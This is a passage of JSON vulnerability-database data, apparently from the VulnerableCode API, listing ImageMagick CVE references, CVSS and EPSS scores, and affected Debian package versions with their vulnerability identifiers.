"scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732278", "reference_id": "1732278", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1732278" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931196", "reference_id": "931196", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931196" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/6985-1/", "reference_id": "USN-6985-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6985-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-12974" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7gya-qyjx-qqfx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82353?format=api", "vulnerability_id": "VCID-7yur-twpa-n3e1", "summary": "ImageMagick: heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a width of zero is mishandled", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13295.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-13295.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00297", "scoring_system": "epss", "scoring_elements": "0.53043", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00297", "scoring_system": "epss", "scoring_elements": "0.53077", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53536", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53562", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53531", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53581", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53577", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53627", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53609", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53592", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53629", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53634", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00303", "scoring_system": "epss", "scoring_elements": "0.53513", "published_at": "2026-04-01T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": 